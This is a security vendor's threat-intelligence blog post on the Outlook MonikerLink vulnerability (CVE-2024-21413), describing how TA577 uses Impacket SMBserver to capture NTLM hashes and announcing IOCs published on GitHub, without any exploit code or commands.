Skip to content

Critical IOCs from Recent Outlook Exploit: Insights by SamurAI MDR   


Published:

Our SamurAI Managed Detection and Response (MDR) team has identified threat actors exploiting the recent Microsoft Outlook vulnerability, known as MonikerLink, using Impacket SMBserver. In this blog, we’ll delve into the details of the vulnerability, explore how threat actors are leveraging it, and share over 200 Indicators of Compromise (IOCs) that our team has tracked over the past two months. 

A new vulnerability in Microsoft Outlook dubbed MonikerLink (CVE-2024-21413) with a CVSS 9.8/10, has been discovered by a researcher at Checkpoint. A successful exploitation of this vulnerability allows threat actors to obtain NTLM information, including the NTLM hash which can be used for pass-the-hash attacks. By chaining CVE-2024-21413 with another vulnerability, attackers can achieve Remote Code Execution (RCE) on compromised systems, opening the floodgates to potential chaos. 

In a rapid response to CheckPoint’s disclosure, the security researcher known as “Xaitax” unveiled a proof of concept (POC) on GitHub just two days later. This POC demonstrates how to send an email laced with a MonikerLink payload, and once the recipient clicks on the payload, their local NTLM information is instantly transmitted to the attacker’s SMB servers.  

Remarkably, Xaitax’s Github page also mentions that they successfully achieved Remote Code Execution (RCE). However, understanding the catastrophic potential if exploited by malicious actors, Xaitax chose not to release the POC for RCE. 

Just a week after the POC’s release, the SamurAI MDR team detected TA577 actively exploiting the MonikerLink vulnerability. Known as a cybercrime threat actor and a major Qakbot affiliate, TA577 wasted no time in leveraging this new exploit. Qakbot, which initially surfaced around 2008 as a banking trojan, has evolved into a critical player in ransomware attacks. Its infections often serve as precursors to devastating ransomware, including the notorious Black Basta. 

In a striking twist, TA577 utilized Impacket SMBserver to capture NTLM information from their victims. The SamurAI MDR team has been closely monitoring Impacket SMBserver activity across multiple OSINT (Open Source Intelligence) platforms and is eager to share their findings with the cybersecurity community. We’ve compiled over 200 IOCs on our Github. These IOCs include detailed timestamps of SMBserver activity, which can significantly reduce false positives and enhance your threat detection efforts.  

Are you unsure if your business is safe and protected from cybercriminals? Let’s talk. 

By taking proactive measures and remaining vigilant, we can collectively defend against cyber threats and safeguard sensitive data from exploitation. Let’s prioritize cybersecurity and work together to ensure a safer digital environment for all. Fill in the form and we’ll contact you.